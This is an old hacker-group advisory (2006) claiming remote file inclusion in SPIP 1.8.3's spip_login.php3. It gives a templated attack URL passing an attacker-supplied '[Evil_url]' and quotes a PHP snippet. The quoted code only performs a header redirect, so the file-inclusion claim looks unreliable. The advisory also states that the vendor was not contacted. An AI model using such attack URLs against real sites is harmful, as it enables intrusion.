k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k k k k
k k kkkk k kkkk k k kk k k kkkk k kk k k k

------------------------------------------------------------------------------

>=- Remote file inclusion in SPIP


Author : Rusydi Hasan M
a.k.a : cR45H3R
Date : April,8th 2006
Risk : High

>=- Software description


SIPP is a CMS portal with multilanguage support
Version : 1.8.3
URL : http://www.spip.net

>=- The Vulnerable


http://[victim]/[spip_dir]/spip_login.php3?url=[Evil_url]

---spip_login.php3---------------------------------------------------------------
.............

if (isset($_SERVER['REQUEST_URI'])
AND strpos($_SERVER['REQUEST_URI'], 'var_url'))
@header('Location: '.str_replace('var_url', 'url', $_SERVER['REQUEST_URI']));

.............
---spip_login.php3---------------------------------------------------------------

>=- Vendor


Not contacted yet

>=- Shoutz


~ kecoak (cybertank,cyb3rh3b,cahcephoe,scut,degleng,etc)
~ echo staff
(y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,the day)
~ Ph03n1x,spyoff,ghoz,r34d3r,m_beben,slackX,sakitjiw a,xnuxer

>=- Contact


crasher@kecoak.or.id || http://www.kecoak.or.id